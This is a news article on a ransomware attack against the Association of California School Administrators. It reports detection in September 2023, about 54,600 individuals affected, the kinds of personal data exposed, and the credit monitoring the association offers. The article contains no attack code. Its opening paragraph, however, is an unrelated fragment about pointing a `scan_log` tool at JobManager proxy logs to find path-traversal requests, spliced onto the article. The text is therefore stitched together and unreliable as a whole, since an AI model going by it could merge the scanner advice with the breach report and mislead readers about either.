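Run it directly to see the findings and version verdicts; in practice, point `scan_log` at the logs of the reverse proxy or web server in front of the JobManager and treat a traversal request that returned HTTP 200 as the higher-priority finding, since a 404 only shows an attempt while a 200 shows the server served something.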

Association of California School Administrators Reports Ransomware Attack

By: Alan J
24 May 2024 at 05:10

Association of California School Administrators, California School Administrators Association Ransomware Attack

An unknown ransomware actor has compromised the personally identifiable data of more than 50,000 Californian school administrators, their association told Maine's Attorney General in a breach notice. The Association of California School Administrators (ACSA), the largest association for school leaders in the United States, said it spotted the data breach in September 2023, when an unauthorized actor accessed and potentially exfiltrated sensitive data.

Association of California School Administrators Ransomware Attack Investigation

The association's notice to the Maine Attorney General revealed that it had first detected "encryption activity" indicative of a ransomware attack in its computer environment on September 24, last year. No threat group has yet claimed responsibility for the attack. This detection was followed by an investigation, aided by third-party cybersecurity experts, which confirmed unauthorized access to various ACSA systems over the two days following the initial access. The threat actor was found to have potentially accessed and stolen sensitive data from the compromised systems.

The association also worked to validate the results of the investigation and locate missing address information. After ACSA completed the process of validating and identifying affected individuals on May 3, 2024, it then took up the task of notifying all potentially affected individuals on May 22. ACSA informed the Maine Attorney General that approximately 54,600 individuals were impacted by the incident, including 14 Maine residents. Individuals impacted by the breach were provided with specific details about the incident and the steps they could take to protect their personal information.

The compromised files were found to contain sensitive data such as names, addresses, dates of birth, Social Security numbers, driver's license numbers, payment card information, medical information, health insurance details, tax IDs, student records (report cards and test scores), employer-assigned identification numbers, and online account credentials.

Recommendations and Additional Resources to Affected Individuals

In response to the breach, ACSA notified federal law enforcement, implemented additional security measures such as training of its employees, and provided guidance to the affected individuals on protecting themselves from associated risks such as identity theft and fraud. The association stated that there was no evidence of identity theft or fraud resulting from the event. However, as a precautionary measure, it is offering credit monitoring services for 12 months to the affected individuals at no cost. These services include credit and CyberScan monitoring, a million-dollar insurance reimbursement policy, and fully managed identity theft recovery services. ACSA encouraged affected individuals to enrol in these services before the deadline of August 22, 2024.

ACSA advises all affected individuals to monitor their accounts and credit reports for any unauthorized activity, stating that it takes the privacy and security of sensitive information within its care seriously and regrets any inconvenience the incident has caused. The guidance also offered instructions on reporting suspicious activity to banks and credit card companies, placing fraud alerts and credit freezes on credit files, and obtaining the free credit reports available under U.S. law. ACSA is also encouraging individuals to contact the Federal Trade Commission, state attorneys general, and law enforcement to report any incidents of identity theft.